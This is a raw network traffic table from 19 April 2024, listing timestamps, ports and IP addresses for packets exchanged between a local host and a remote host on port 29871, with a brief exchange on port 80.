Apr 19, 2024 19:12:12.930228949 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930236101 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930253029 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930269957 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930286884 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930289984 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930305004 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930306911 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930325985 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930344105 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930358887 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930361986 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930382013 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930383921 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930398941 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930417061 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930433035 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930433989 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930449963 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930455923 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930469036 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930486917 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930488110 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930505991 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930526018 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:12.930545092 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:12.930563927 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.132117987 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.132153034 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.132174969 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.132194996 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.132308960 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.132308960 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133141994 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133171082 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133188963 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133209944 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133213997 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133229017 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133245945 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133248091 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133269072 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133285999 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133305073 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133305073 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133322001 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133326054 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133342028 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133358002 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133359909 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133377075 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133394957 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133410931 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133411884 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133430004 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133433104 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133449078 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133466005 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133466959 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133482933 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133501053 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133517981 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133518934 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133537054 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133539915 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133554935 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133572102 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133573055 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133590937 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133610010 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133627892 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133629084 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133647919 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133651972 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133666992 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133683920 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133702040 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133702993 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133727074 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133738041 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133754969 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133776903 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133795023 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133804083 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133812904 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133820057 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133831024 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133846045 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133848906 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133867979 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133883953 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133886099 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133904934 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133925915 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133944035 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133949041 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133961916 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133970976 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133980989 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.133995056 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.133997917 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134016037 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134032965 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134037018 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134049892 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134082079 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134098053 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134099960 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134118080 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134119987 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134135962 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134154081 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134174109 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134181976 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134192944 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134202003 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134211063 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134224892 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134231091 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134248972 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134265900 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134267092 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134284973 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134304047 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134320974 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134326935 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134342909 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134351015 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134361029 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134380102 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134382963 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134398937 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134417057 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134419918 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134434938 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134453058 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134459019 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134469986 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134488106 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134504080 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134505033 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134524107 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134525061 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134541988 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134561062 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134577036 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134577990 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134598017 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134599924 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134618044 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134634972 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134653091 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134658098 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134671926 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134675980 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134690046 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134708881 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134725094 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134727955 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134746075 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134747028 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134764910 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134784937 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134800911 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134803057 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134820938 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134824038 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134841919 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134859085 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134876013 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134877920 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134896040 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134897947 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134916067 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134933949 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134951115 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134951115 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134968996 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.134974003 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.134985924 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135003090 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135004044 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135020971 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135039091 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135056019 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135056973 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135073900 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135075092 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135092020 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135109901 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135124922 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135127068 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135145903 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135145903 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135174990 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135193110 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135209084 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135212898 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135231018 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135231972 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135251045 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135267973 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135282993 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135287046 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135303974 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135305882 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135323048 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135339975 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135356903 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.135356903 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135376930 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.135377884 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.137165070 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.230597019 CEST | 80 | 49740 | 178.237.33.50 | 192.168.2.4 |
Apr 19, 2024 19:12:13.231190920 CEST | 49740 | 80 | 192.168.2.4 | 178.237.33.50 |
Apr 19, 2024 19:12:13.334693909 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334727049 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334745884 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334763050 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334783077 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334804058 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334822893 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334845066 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.334907055 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.334907055 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.334908009 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.334908009 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.335630894 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.335678101 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.335699081 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.335716009 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.335756063 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.335793972 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337254047 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337388992 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337407112 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337429047 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337446928 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337464094 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337455034 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337486982 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337505102 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337523937 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337524891 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337524891 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337548018 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337572098 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337590933 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337609053 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337625980 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337634087 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337642908 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337655067 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337661028 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337677956 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337696075 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337704897 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337713957 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337728024 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337733030 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337750912 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337769032 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337774992 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337786913 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337804079 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337805986 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337822914 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337840080 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337847948 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337857008 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337867022 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337876081 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
